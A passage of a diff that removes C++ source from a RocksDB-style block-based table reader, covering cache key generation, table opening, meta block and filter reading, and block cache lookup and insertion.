-    *size = static_cast<size_t>(end - buffer);
-  }
-}
-
-void BlockBasedTable::GenerateCachePrefix(Cache* cc,
-    WritableFile* file, char* buffer, size_t* size) {
-
-  // generate an id from the file
-  *size = file->GetUniqueId(buffer, kMaxCacheKeyPrefixSize);
-
-  // If the prefix wasn't generated or was too long,
-  // create one from the cache.
-  if (*size == 0) {
-    char* end = EncodeVarint64(buffer, cc->NewId());
-    *size = static_cast<size_t>(end - buffer);
-  }
-}
-
-namespace {
-// Return True if table_properties has `user_prop_name` has a `true` value
-// or it doesn't contain this property (for backward compatible).
-bool IsFeatureSupported(const TableProperties& table_properties,
-                        const std::string& user_prop_name, Logger* info_log) {
-  auto& props = table_properties.user_collected_properties;
-  auto pos = props.find(user_prop_name);
-  // Older version doesn't have this value set. Skip this check.
-  if (pos != props.end()) {
-    if (pos->second == kPropFalse) {
-      return false;
-    } else if (pos->second != kPropTrue) {
-      ROCKS_LOG_WARN(info_log, "Property %s has invalidate value %s",
-                     user_prop_name.c_str(), pos->second.c_str());
-    }
-  }
-  return true;
-}
-
-SequenceNumber GetGlobalSequenceNumber(const TableProperties& table_properties,
-                                       Logger* info_log) {
-  auto& props = table_properties.user_collected_properties;
-
-  auto version_pos = props.find(ExternalSstFilePropertyNames::kVersion);
-  auto seqno_pos = props.find(ExternalSstFilePropertyNames::kGlobalSeqno);
-
-  if (version_pos == props.end()) {
-    if (seqno_pos != props.end()) {
-      // This is not an external sst file, global_seqno is not supported.
-      assert(false);
-      ROCKS_LOG_ERROR(
-          info_log,
-          "A non-external sst file have global seqno property with value %s",
-          seqno_pos->second.c_str());
-    }
-    return kDisableGlobalSequenceNumber;
-  }
-
-  uint32_t version = DecodeFixed32(version_pos->second.c_str());
-  if (version < 2) {
-    if (seqno_pos != props.end() || version != 1) {
-      // This is a v1 external sst file, global_seqno is not supported.
-      assert(false);
-      ROCKS_LOG_ERROR(
-          info_log,
-          "An external sst file with version %u have global seqno property "
-          "with value %s",
-          version, seqno_pos->second.c_str());
-    }
-    return kDisableGlobalSequenceNumber;
-  }
-
-  SequenceNumber global_seqno = DecodeFixed64(seqno_pos->second.c_str());
-
-  if (global_seqno > kMaxSequenceNumber) {
-    assert(false);
-    ROCKS_LOG_ERROR(
-        info_log,
-        "An external sst file with version %u have global seqno property "
-        "with value %llu, which is greater than kMaxSequenceNumber",
-        version, global_seqno);
-  }
-
-  return global_seqno;
-}
-}  // namespace
-
-Slice BlockBasedTable::GetCacheKey(const char* cache_key_prefix,
-                                   size_t cache_key_prefix_size,
-                                   const BlockHandle& handle, char* cache_key) {
-  assert(cache_key != nullptr);
-  assert(cache_key_prefix_size != 0);
-  assert(cache_key_prefix_size <= kMaxCacheKeyPrefixSize);
-  memcpy(cache_key, cache_key_prefix, cache_key_prefix_size);
-  char* end =
-      EncodeVarint64(cache_key + cache_key_prefix_size, handle.offset());
-  return Slice(cache_key, static_cast<size_t>(end - cache_key));
-}
-
-Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions,
-                             const EnvOptions& env_options,
-                             const BlockBasedTableOptions& table_options,
-                             const InternalKeyComparator& internal_comparator,
-                             unique_ptr<RandomAccessFileReader>&& file,
-                             uint64_t file_size,
-                             unique_ptr<TableReader>* table_reader,
-                             const bool prefetch_index_and_filter_in_cache,
-                             const bool skip_filters, const int level) {
-  table_reader->reset();
-
-  Footer footer;
-
-  std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-
-  // Before read footer, readahead backwards to prefetch data
-  const size_t kTailPrefetchSize = 512 * 1024;
-  size_t prefetch_off;
-  size_t prefetch_len;
-  if (file_size < kTailPrefetchSize) {
-    prefetch_off = 0;
-    prefetch_len = file_size;
-  } else {
-    prefetch_off = file_size - kTailPrefetchSize;
-    prefetch_len = kTailPrefetchSize;
-  }
-  Status s;
-  // TODO should not have this special logic in the future.
-  if (!file->use_direct_io()) {
-    s = file->Prefetch(prefetch_off, prefetch_len);
-  } else {
-    prefetch_buffer.reset(new FilePrefetchBuffer());
-    s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-  }
-  s = ReadFooterFromFile(file.get(), prefetch_buffer.get(), file_size, &footer,
-                         kBlockBasedTableMagicNumber);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!BlockBasedTableSupportedVersion(footer.version())) {
-    return Status::Corruption(
-        "Unknown Footer version. Maybe this file was created with newer "
-        "version of RocksDB?");
-  }
-
-  // We've successfully read the footer. We are ready to serve requests.
-  // Better not mutate rep_ after the creation. eg. internal_prefix_transform
-  // raw pointer will be used to create HashIndexReader, whose reset may
-  // access a dangling pointer.
-  Rep* rep = new BlockBasedTable::Rep(ioptions, env_options, table_options,
-                                      internal_comparator, skip_filters);
-  rep->file = std::move(file);
-  rep->footer = footer;
-  rep->index_type = table_options.index_type;
-  rep->hash_index_allow_collision = table_options.hash_index_allow_collision;
-  // We need to wrap data with internal_prefix_transform to make sure it can
-  // handle prefix correctly.
-  rep->internal_prefix_transform.reset(
-      new InternalKeySliceTransform(rep->ioptions.prefix_extractor));
-  SetupCacheKeyPrefix(rep, file_size);
-  unique_ptr<BlockBasedTable> new_table(new BlockBasedTable(rep));
-
-  // page cache options
-  rep->persistent_cache_options =
-      PersistentCacheOptions(rep->table_options.persistent_cache,
-                             std::string(rep->persistent_cache_key_prefix,
-                                         rep->persistent_cache_key_prefix_size),
-                                         rep->ioptions.statistics);
-
-  // Read meta index
-  std::unique_ptr<Block> meta;
-  std::unique_ptr<InternalIterator> meta_iter;
-  s = ReadMetaBlock(rep, prefetch_buffer.get(), &meta, &meta_iter);
-  if (!s.ok()) {
-    return s;
-  }
-
-  // Find filter handle and filter type
-  if (rep->filter_policy) {
-    for (auto filter_type :
-         {Rep::FilterType::kFullFilter, Rep::FilterType::kPartitionedFilter,
-          Rep::FilterType::kBlockFilter}) {
-      std::string prefix;
-      switch (filter_type) {
-        case Rep::FilterType::kFullFilter:
-          prefix = kFullFilterBlockPrefix;
-          break;
-        case Rep::FilterType::kPartitionedFilter:
-          prefix = kPartitionedFilterBlockPrefix;
-          break;
-        case Rep::FilterType::kBlockFilter:
-          prefix = kFilterBlockPrefix;
-          break;
-        default:
-          assert(0);
-      }
-      std::string filter_block_key = prefix;
-      filter_block_key.append(rep->filter_policy->Name());
-      if (FindMetaBlock(meta_iter.get(), filter_block_key, &rep->filter_handle)
-              .ok()) {
-        rep->filter_type = filter_type;
-        break;
-      }
-    }
-  }
-
-  // Read the properties
-  bool found_properties_block = true;
-  s = SeekToPropertiesBlock(meta_iter.get(), &found_properties_block);
-
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(rep->ioptions.info_log,
-                   "Error when seeking to properties block from file: %s",
-                   s.ToString().c_str());
-  } else if (found_properties_block) {
-    s = meta_iter->status();
-    TableProperties* table_properties = nullptr;
-    if (s.ok()) {
-      s = ReadProperties(meta_iter->value(), rep->file.get(),
-                         prefetch_buffer.get(), rep->footer, rep->ioptions,
-                         &table_properties);
-    }
-
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log,
-                     "Encountered error while reading data from properties "
-                     "block %s",
-                     s.ToString().c_str());
-    } else {
-      rep->table_properties.reset(table_properties);
-    }
-  } else {
-    ROCKS_LOG_ERROR(rep->ioptions.info_log,
-                    "Cannot find Properties block from file.");
-  }
-
-  // Read the compression dictionary meta block
-  bool found_compression_dict;
-  s = SeekToCompressionDictBlock(meta_iter.get(), &found_compression_dict);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(
-        rep->ioptions.info_log,
-        "Error when seeking to compression dictionary block from file: %s",
-        s.ToString().c_str());
-  } else if (found_compression_dict) {
-    // TODO(andrewkr): Add to block cache if cache_index_and_filter_blocks is
-    // true.
-    unique_ptr<BlockContents> compression_dict_block{new BlockContents()};
-    // TODO(andrewkr): ReadMetaBlock repeats SeekToCompressionDictBlock().
-    // maybe decode a handle from meta_iter
-    // and do ReadBlockContents(handle) instead
-    s = rocksdb::ReadMetaBlock(rep->file.get(), prefetch_buffer.get(),
-                               file_size, kBlockBasedTableMagicNumber,
-                               rep->ioptions, rocksdb::kCompressionDictBlock,
-                               compression_dict_block.get());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(
-          rep->ioptions.info_log,
-          "Encountered error while reading data from compression dictionary "
-          "block %s",
-          s.ToString().c_str());
-    } else {
-      rep->compression_dict_block = std::move(compression_dict_block);
-    }
-  }
-
-  // Read the range del meta block
-  bool found_range_del_block;
-  s = SeekToRangeDelBlock(meta_iter.get(), &found_range_del_block,
-                          &rep->range_del_handle);
-  if (!s.ok()) {
-    ROCKS_LOG_WARN(
-        rep->ioptions.info_log,
-        "Error when seeking to range delete tombstones block from file: %s",
-        s.ToString().c_str());
-  } else {
-    if (found_range_del_block && !rep->range_del_handle.IsNull()) {
-      ReadOptions read_options;
-      s = MaybeLoadDataBlockToCache(
-          prefetch_buffer.get(), rep, read_options, rep->range_del_handle,
-          Slice() /* compression_dict */, &rep->range_del_entry);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(
-            rep->ioptions.info_log,
-            "Encountered error while reading data from range del block %s",
-            s.ToString().c_str());
-      }
-    }
-  }
-
-  // Determine whether whole key filtering is supported.
-  if (rep->table_properties) {
-    rep->whole_key_filtering &=
-        IsFeatureSupported(*(rep->table_properties),
-                           BlockBasedTablePropertyNames::kWholeKeyFiltering,
-                           rep->ioptions.info_log);
-    rep->prefix_filtering &= IsFeatureSupported(
-        *(rep->table_properties),
-        BlockBasedTablePropertyNames::kPrefixFiltering, rep->ioptions.info_log);
-
-    rep->global_seqno = GetGlobalSequenceNumber(*(rep->table_properties),
-                                                rep->ioptions.info_log);
-  }
-
-  const bool pin =
-      rep->table_options.pin_l0_filter_and_index_blocks_in_cache && level == 0;
-  // pre-fetching of blocks is turned on
-  // Will use block cache for index/filter blocks access
-  // Always prefetch index and filter for level 0
-  if (table_options.cache_index_and_filter_blocks) {
-    if (prefetch_index_and_filter_in_cache || level == 0) {
-      assert(table_options.block_cache != nullptr);
-      // Hack: Call NewIndexIterator() to implicitly add index to the
-      // block_cache
-
-      CachableEntry<IndexReader> index_entry;
-      unique_ptr<InternalIterator> iter(
-          new_table->NewIndexIterator(ReadOptions(), nullptr, &index_entry));
-      index_entry.value->CacheDependencies(pin);
-      if (pin) {
-        rep->index_entry = std::move(index_entry);
-      } else {
-        index_entry.Release(table_options.block_cache.get());
-      }
-      s = iter->status();
-
-      if (s.ok()) {
-        // Hack: Call GetFilter() to implicitly add filter to the block_cache
-        auto filter_entry = new_table->GetFilter();
-        if (filter_entry.value != nullptr) {
-          filter_entry.value->CacheDependencies(pin);
-        }
-        // if pin_l0_filter_and_index_blocks_in_cache is true, and this is
-        // a level0 file, then save it in rep_->filter_entry; it will be
-        // released in the destructor only, hence it will be pinned in the
-        // cache while this reader is alive
-        if (pin) {
-          rep->filter_entry = filter_entry;
-        } else {
-          filter_entry.Release(table_options.block_cache.get());
-        }
-      }
-    }
-  } else {
-    // If we don't use block cache for index/filter blocks access, we'll
-    // pre-load these blocks, which will kept in member variables in Rep
-    // and with a same life-time as this table object.
-    IndexReader* index_reader = nullptr;
-    s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader,
-                                     meta_iter.get(), level);
-    if (s.ok()) {
-      rep->index_reader.reset(index_reader);
-      // The partitions of partitioned index are always stored in cache. They
-      // are hence follow the configuration for pin and prefetch regardless of
-      // the value of cache_index_and_filter_blocks
-      if (prefetch_index_and_filter_in_cache || level == 0) {
-        rep->index_reader->CacheDependencies(pin);
-      }
-
-      // Set filter block
-      if (rep->filter_policy) {
-        const bool is_a_filter_partition = true;
-        auto filter = new_table->ReadFilter(
-            prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition);
-        rep->filter.reset(filter);
-        // Refer to the comment above about paritioned indexes always being
-        // cached
-        if (filter && (prefetch_index_and_filter_in_cache || level == 0)) {
-          filter->CacheDependencies(pin);
-        }
-      }
-    } else {
-      delete index_reader;
-    }
-  }
-
-  if (s.ok()) {
-    *table_reader = std::move(new_table);
-  }
-
-  return s;
-}
-
-void BlockBasedTable::SetupForCompaction() {
-  switch (rep_->ioptions.access_hint_on_compaction_start) {
-    case Options::NONE:
-      break;
-    case Options::NORMAL:
-      rep_->file->file()->Hint(RandomAccessFile::NORMAL);
-      break;
-    case Options::SEQUENTIAL:
-      rep_->file->file()->Hint(RandomAccessFile::SEQUENTIAL);
-      break;
-    case Options::WILLNEED:
-      rep_->file->file()->Hint(RandomAccessFile::WILLNEED);
-      break;
-    default:
-      assert(false);
-  }
-}
-
-std::shared_ptr<const TableProperties> BlockBasedTable::GetTableProperties()
-    const {
-  return rep_->table_properties;
-}
-
-size_t BlockBasedTable::ApproximateMemoryUsage() const {
-  size_t usage = 0;
-  if (rep_->filter) {
-    usage += rep_->filter->ApproximateMemoryUsage();
-  }
-  if (rep_->index_reader) {
-    usage += rep_->index_reader->ApproximateMemoryUsage();
-  }
-  return usage;
-}
-
-// Load the meta-block from the file. On success, return the loaded meta block
-// and its iterator.
-Status BlockBasedTable::ReadMetaBlock(Rep* rep,
-                                      FilePrefetchBuffer* prefetch_buffer,
-                                      std::unique_ptr<Block>* meta_block,
-                                      std::unique_ptr<InternalIterator>* iter) {
-  // TODO(sanjay): Skip this if footer.metaindex_handle() size indicates
-  // it is an empty block.
-  std::unique_ptr<Block> meta;
-  Status s = ReadBlockFromFile(
-      rep->file.get(), prefetch_buffer, rep->footer, ReadOptions(),
-      rep->footer.metaindex_handle(), &meta, rep->ioptions,
-      true /* decompress */, Slice() /*compression dict*/,
-      rep->persistent_cache_options, kDisableGlobalSequenceNumber,
-      0 /* read_amp_bytes_per_bit */);
-
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(rep->ioptions.info_log,
-                    "Encountered error while reading data from properties"
-                    " block %s",
-                    s.ToString().c_str());
-    return s;
-  }
-
-  *meta_block = std::move(meta);
-  // meta block uses bytewise comparator.
-  iter->reset(meta_block->get()->NewIterator(BytewiseComparator()));
-  return Status::OK();
-}
-
-Status BlockBasedTable::GetDataBlockFromCache(
-    const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-    Cache* block_cache, Cache* block_cache_compressed,
-    const ImmutableCFOptions& ioptions, const ReadOptions& read_options,
-    BlockBasedTable::CachableEntry<Block>* block, uint32_t format_version,
-    const Slice& compression_dict, size_t read_amp_bytes_per_bit,
-    bool is_index) {
-  Status s;
-  Block* compressed_block = nullptr;
-  Cache::Handle* block_cache_compressed_handle = nullptr;
-  Statistics* statistics = ioptions.statistics;
-
-  // Lookup uncompressed cache first
-  if (block_cache != nullptr) {
-    block->cache_handle = GetEntryFromCache(
-        block_cache, block_cache_key,
-        is_index ? BLOCK_CACHE_INDEX_MISS : BLOCK_CACHE_DATA_MISS,
-        is_index ? BLOCK_CACHE_INDEX_HIT : BLOCK_CACHE_DATA_HIT, statistics);
-    if (block->cache_handle != nullptr) {
-      block->value =
-          reinterpret_cast<Block*>(block_cache->Value(block->cache_handle));
-      return s;
-    }
-  }
-
-  // If not found, search from the compressed block cache.
-  assert(block->cache_handle == nullptr && block->value == nullptr);
-
-  if (block_cache_compressed == nullptr) {
-    return s;
-  }
-
-  assert(!compressed_block_cache_key.empty());
-  block_cache_compressed_handle =
-      block_cache_compressed->Lookup(compressed_block_cache_key);
-  // if we found in the compressed cache, then uncompress and insert into
-  // uncompressed cache
-  if (block_cache_compressed_handle == nullptr) {
-    RecordTick(statistics, BLOCK_CACHE_COMPRESSED_MISS);
-    return s;
-  }
-
-  // found compressed block
-  RecordTick(statistics, BLOCK_CACHE_COMPRESSED_HIT);
-  compressed_block = reinterpret_cast<Block*>(
-      block_cache_compressed->Value(block_cache_compressed_handle));
-  assert(compressed_block->compression_type() != kNoCompression);
-
-  // Retrieve the uncompressed contents into a new buffer
-  BlockContents contents;
-  s = UncompressBlockContents(compressed_block->data(),
-                              compressed_block->size(), &contents,
-                              format_version, compression_dict,
-                              ioptions);
-
-  // Insert uncompressed block into block cache
-  if (s.ok()) {
-    block->value =
-        new Block(std::move(contents), compressed_block->global_seqno(),
-                  read_amp_bytes_per_bit,
-                  statistics);  // uncompressed block
-    assert(block->value->compression_type() == kNoCompression);
-    if (block_cache != nullptr && block->value->cachable() &&
-        read_options.fill_cache) {
-      s = block_cache->Insert(
-          block_cache_key, block->value, block->value->usable_size(),
-          &DeleteCachedEntry<Block>, &(block->cache_handle));
-      block_cache->TEST_mark_as_data_block(block_cache_key,
-                                           block->value->usable_size());
-      if (s.ok()) {
-        RecordTick(statistics, BLOCK_CACHE_ADD);
-        if (is_index) {
-          RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-          RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT,
-                     block->value->usable_size());
-        } else {
-          RecordTick(statistics, BLOCK_CACHE_DATA_ADD);
-          RecordTick(statistics, BLOCK_CACHE_DATA_BYTES_INSERT,
-                     block->value->usable_size());
-        }
-        RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE,
-                   block->value->usable_size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-        delete block->value;
-        block->value = nullptr;
-      }
-    }
-  }
-
-  // Release hold on compressed cache entry
-  block_cache_compressed->Release(block_cache_compressed_handle);
-  return s;
-}
-
-Status BlockBasedTable::PutDataBlockToCache(
-    const Slice& block_cache_key, const Slice& compressed_block_cache_key,
-    Cache* block_cache, Cache* block_cache_compressed,
-    const ReadOptions& read_options, const ImmutableCFOptions& ioptions,
-    CachableEntry<Block>* block, Block* raw_block, uint32_t format_version,
-    const Slice& compression_dict, size_t read_amp_bytes_per_bit, bool is_index,
-    Cache::Priority priority) {
-  assert(raw_block->compression_type() == kNoCompression ||
-         block_cache_compressed != nullptr);
-
-  Status s;
-  // Retrieve the uncompressed contents into a new buffer
-  BlockContents contents;
-  Statistics* statistics = ioptions.statistics;
-  if (raw_block->compression_type() != kNoCompression) {
-    s = UncompressBlockContents(raw_block->data(), raw_block->size(), &contents,
-                                format_version, compression_dict, ioptions);
-  }
-  if (!s.ok()) {
-    delete raw_block;
-    return s;
-  }
-
-  if (raw_block->compression_type() != kNoCompression) {
-    block->value = new Block(std::move(contents), raw_block->global_seqno(),
-                             read_amp_bytes_per_bit,
-                             statistics);  // uncompressed block
-  } else {
-    block->value = raw_block;
-    raw_block = nullptr;
-  }
-
-  // Insert compressed block into compressed block cache.
-  // Release the hold on the compressed cache entry immediately.
-  if (block_cache_compressed != nullptr && raw_block != nullptr &&
-      raw_block->cachable()) {
-    s = block_cache_compressed->Insert(compressed_block_cache_key, raw_block,
-                                       raw_block->usable_size(),
-                                       &DeleteCachedEntry<Block>);
-    if (s.ok()) {
-      // Avoid the following code to delete this cached block.
-      raw_block = nullptr;
-      RecordTick(statistics, BLOCK_CACHE_COMPRESSED_ADD);
-    } else {
-      RecordTick(statistics, BLOCK_CACHE_COMPRESSED_ADD_FAILURES);
-    }
-  }
-  delete raw_block;
-
-  // insert into uncompressed block cache
-  assert((block->value->compression_type() == kNoCompression));
-  if (block_cache != nullptr && block->value->cachable()) {
-    s = block_cache->Insert(
-        block_cache_key, block->value, block->value->usable_size(),
-        &DeleteCachedEntry<Block>, &(block->cache_handle), priority);
-    block_cache->TEST_mark_as_data_block(block_cache_key,
-                                         block->value->usable_size());
-    if (s.ok()) {
-      assert(block->cache_handle != nullptr);
-      RecordTick(statistics, BLOCK_CACHE_ADD);
-      if (is_index) {
-        RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-        RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT,
-                   block->value->usable_size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_DATA_ADD);
-        RecordTick(statistics, BLOCK_CACHE_DATA_BYTES_INSERT,
-                   block->value->usable_size());
-      }
-      RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE,
-                 block->value->usable_size());
-      assert(reinterpret_cast<Block*>(
-                 block_cache->Value(block->cache_handle)) == block->value);
-    } else {
-      RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-      delete block->value;
-      block->value = nullptr;
-    }
-  }
-
-  return s;
-}
-
-FilterBlockReader* BlockBasedTable::ReadFilter(
-    FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_handle,
-    const bool is_a_filter_partition) const {
-  auto& rep = rep_;
-  // TODO: We might want to unify with ReadBlockFromFile() if we start
-  // requiring checksum verification in Table::Open.
-  if (rep->filter_type == Rep::FilterType::kNoFilter) {
-    return nullptr;
-  }
-  BlockContents block;
-  if (!ReadBlockContents(rep->file.get(), prefetch_buffer, rep->footer,
-                         ReadOptions(), filter_handle, &block, rep->ioptions,
-                         false /* decompress */, Slice() /*compression dict*/,
-                         rep->persistent_cache_options)
-           .ok()) {
-    // Error reading the block
-    return nullptr;
-  }
-
-  assert(rep->filter_policy);
-
-  auto filter_type = rep->filter_type;
-  if (rep->filter_type == Rep::FilterType::kPartitionedFilter &&
-      is_a_filter_partition) {
-    filter_type = Rep::FilterType::kFullFilter;
-  }
-
-  switch (filter_type) {
-    case Rep::FilterType::kPartitionedFilter: {
-      return new PartitionedFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->whole_key_filtering, std::move(block), nullptr,
-          rep->ioptions.statistics, rep->internal_comparator, this);
-    }
-
-    case Rep::FilterType::kBlockFilter:
-      return new BlockBasedFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->table_options, rep->whole_key_filtering, std::move(block),
-          rep->ioptions.statistics);
-
-    case Rep::FilterType::kFullFilter: {
-      auto filter_bits_reader =
-          rep->filter_policy->GetFilterBitsReader(block.data);
-      assert(filter_bits_reader != nullptr);
-      return new FullFilterBlockReader(
-          rep->prefix_filtering ? rep->ioptions.prefix_extractor : nullptr,
-          rep->whole_key_filtering, std::move(block), filter_bits_reader,
-          rep->ioptions.statistics);
-    }
-
-    default:
-      // filter_type is either kNoFilter (exited the function at the first if),
-      // or it must be covered in this switch block
-      assert(false);
-      return nullptr;
-  }
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter(
-    FilePrefetchBuffer* prefetch_buffer, bool no_io) const {
-  const BlockHandle& filter_blk_handle = rep_->filter_handle;
-  const bool is_a_filter_partition = true;
-  return GetFilter(prefetch_buffer, filter_blk_handle, !is_a_filter_partition,
-                   no_io);
-}
-
-BlockBasedTable::CachableEntry<FilterBlockReader> BlockBasedTable::GetFilter(
-    FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle,
-    const bool is_a_filter_partition, bool no_io) const {
-  // If cache_index_and_filter_blocks is false, filter should be pre-populated.
-  // We will return rep_->filter anyway. rep_->filter can be nullptr if filter
-  // read fails at Open() time. We don't want to reload again since it will
-  // most probably fail again.
-  if (!is_a_filter_partition &&
-      !rep_->table_options.cache_index_and_filter_blocks) {
-    return {rep_->filter.get(), nullptr /* cache handle */};
-  }
-
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  if (rep_->filter_policy == nullptr /* do not use filter */ ||
-      block_cache == nullptr /* no block cache at all */) {
-    return {nullptr /* filter */, nullptr /* cache handle */};
-  }
-
-  if (!is_a_filter_partition && rep_->filter_entry.IsSet()) {
-    return rep_->filter_entry;
-  }
-
-  PERF_TIMER_GUARD(read_filter_block_nanos);
-
-  // Fetching from the cache
-  char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = GetCacheKey(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                         filter_blk_handle, cache_key);
-
-  Statistics* statistics = rep_->ioptions.statistics;
-  auto cache_handle =
-      GetEntryFromCache(block_cache, key, BLOCK_CACHE_FILTER_MISS,
-                        BLOCK_CACHE_FILTER_HIT, statistics);
-
-  FilterBlockReader* filter = nullptr;
-  if (cache_handle != nullptr) {
-    filter = reinterpret_cast<FilterBlockReader*>(
-        block_cache->Value(cache_handle));
-  } else if (no_io) {
-    // Do not invoke any io.
-    return CachableEntry<FilterBlockReader>();
-  } else {
-    filter =
-        ReadFilter(prefetch_buffer, filter_blk_handle, is_a_filter_partition);
-    if (filter != nullptr) {
-      assert(filter->size() > 0);
-      Status s = block_cache->Insert(
-          key, filter, filter->size(), &DeleteCachedFilterEntry, &cache_handle,
-          rep_->table_options.cache_index_and_filter_blocks_with_high_priority
-              ? Cache::Priority::HIGH
-              : Cache::Priority::LOW);
-      if (s.ok()) {
-        RecordTick(statistics, BLOCK_CACHE_ADD);
-        RecordTick(statistics, BLOCK_CACHE_FILTER_ADD);
-        RecordTick(statistics, BLOCK_CACHE_FILTER_BYTES_INSERT, filter->size());
-        RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE, filter->size());
-      } else {
-        RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-        delete filter;
-        return CachableEntry<FilterBlockReader>();
-      }
-    }
-  }
-
-  return { filter, cache_handle };
-}
-
-InternalIterator* BlockBasedTable::NewIndexIterator(
-    const ReadOptions& read_options, BlockIter* input_iter,
-    CachableEntry<IndexReader>* index_entry) {
-  // index reader has already been pre-populated.
-  if (rep_->index_reader) {
-    return rep_->index_reader->NewIterator(
-        input_iter, read_options.total_order_seek);
-  }
-  // we have a pinned index block
-  if (rep_->index_entry.IsSet()) {
-    return rep_->index_entry.value->NewIterator(input_iter,
-                                                read_options.total_order_seek);
-  }
-
-  PERF_TIMER_GUARD(read_index_block_nanos);
-
-  const bool no_io = read_options.read_tier == kBlockCacheTier;
-  Cache* block_cache = rep_->table_options.block_cache.get();
-  char cache_key[kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key =
-      GetCacheKeyFromOffset(rep_->cache_key_prefix, rep_->cache_key_prefix_size,
-                            rep_->dummy_index_reader_offset, cache_key);
-  Statistics* statistics = rep_->ioptions.statistics;
-  auto cache_handle =
-      GetEntryFromCache(block_cache, key, BLOCK_CACHE_INDEX_MISS,
-                        BLOCK_CACHE_INDEX_HIT, statistics);
-
-  if (cache_handle == nullptr && no_io) {
-    if (input_iter != nullptr) {
-      input_iter->SetStatus(Status::Incomplete("no blocking io"));
-      return input_iter;
-    } else {
-      return NewErrorInternalIterator(Status::Incomplete("no blocking io"));
-    }
-  }
-
-  IndexReader* index_reader = nullptr;
-  if (cache_handle != nullptr) {
-    index_reader =
-        reinterpret_cast<IndexReader*>(block_cache->Value(cache_handle));
-  } else {
-    // Create index reader and put it in the cache.
-    Status s;
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:2");
-    s = CreateIndexReader(nullptr /* prefetch_buffer */, &index_reader);
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:1");
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread2:3");
-    TEST_SYNC_POINT("BlockBasedTable::NewIndexIterator::thread1:4");
-    if (s.ok()) {
-      assert(index_reader != nullptr);
-      s = block_cache->Insert(
-          key, index_reader, index_reader->usable_size(),
-          &DeleteCachedIndexEntry, &cache_handle,
-          rep_->table_options.cache_index_and_filter_blocks_with_high_priority
-              ? Cache::Priority::HIGH
-              : Cache::Priority::LOW);
-    }
-
-    if (s.ok()) {
-      size_t usable_size = index_reader->usable_size();
-      RecordTick(statistics, BLOCK_CACHE_ADD);
-      RecordTick(statistics, BLOCK_CACHE_INDEX_ADD);
-      RecordTick(statistics, BLOCK_CACHE_INDEX_BYTES_INSERT, usable_size);
-      RecordTick(statistics, BLOCK_CACHE_BYTES_WRITE, usable_size);
-    } else {
-      if (index_reader != nullptr) {
-        delete index_reader;
-      }
-      RecordTick(statistics, BLOCK_CACHE_ADD_FAILURES);
-      // make sure if something goes wrong, index_reader shall remain intact.
-      if (input_iter != nullptr) {
-        input_iter->SetStatus(s);
-        return input_iter;
-      } else {
-        return NewErrorInternalIterator(s);
-      }
-    }
-
-  }
-
-  assert(cache_handle);
-  auto* iter = index_reader->NewIterator(
-      input_iter, read_options.total_order_seek);
-
-  // the caller would like to take ownership of the index block
-  // don't call RegisterCleanup() in this case, the caller will take care of it
-  if (index_entry != nullptr) {
-    *index_entry = {index_reader, cache_handle};
-  } else {
-    iter->RegisterCleanup(&ReleaseCachedEntry, block_cache, cache_handle);
-  }
-
-  return iter;
-}
-
-InternalIterator* BlockBasedTable::NewDataBlockIterator(
-    Rep* rep, const ReadOptions& ro, const Slice& index_value,
-    BlockIter* input_iter, bool is_index) {
-  BlockHandle handle;
-  Slice input = index_value;
-  // We intentionally allow extra stuff in index_value so that we
-  // can add more features in the future.
-  Status s = handle.DecodeFrom(&input);
-  return NewDataBlockIterator(rep, ro, handle, input_iter, is_index, s);
-}
-
-// Convert an index iterator value (i.e., an encoded BlockHandle)
-// into an iterator over the contents of the corresponding block.
-// If input_iter is null, new a iterator
-// If input_iter is not null, update this iter and return it
-InternalIterator* BlockBasedTable::NewDataBlockIterator(
-    Rep* rep, const ReadOptions& ro, const BlockHandle& handle,
-    BlockIter* input_iter, bool is_index, Status s) {
-  PERF_TIMER_GUARD(new_table_block_iter_nanos);
-
-  const bool no_io = (ro.read_tier == kBlockCacheTier);
-  Cache* block_cache = rep->table_options.block_cache.get();
-  CachableEntry<Block> block;
-  Slice compression_dict;
-  if (s.ok()) {
-    if (rep->compression_dict_block) {
-      compression_dict = rep->compression_dict_block->data;
-    }
-    s = MaybeLoadDataBlockToCache(nullptr /*prefetch_buffer*/, rep, ro, handle,
-                                  compression_dict, &block, is_index);
-  }
-
-  // Didn't get any data from block caches.
-  if (s.ok() && block.value == nullptr) {
-    if (no_io) {
-      // Could not read from block_cache and can't do IO
-      if (input_iter != nullptr) {
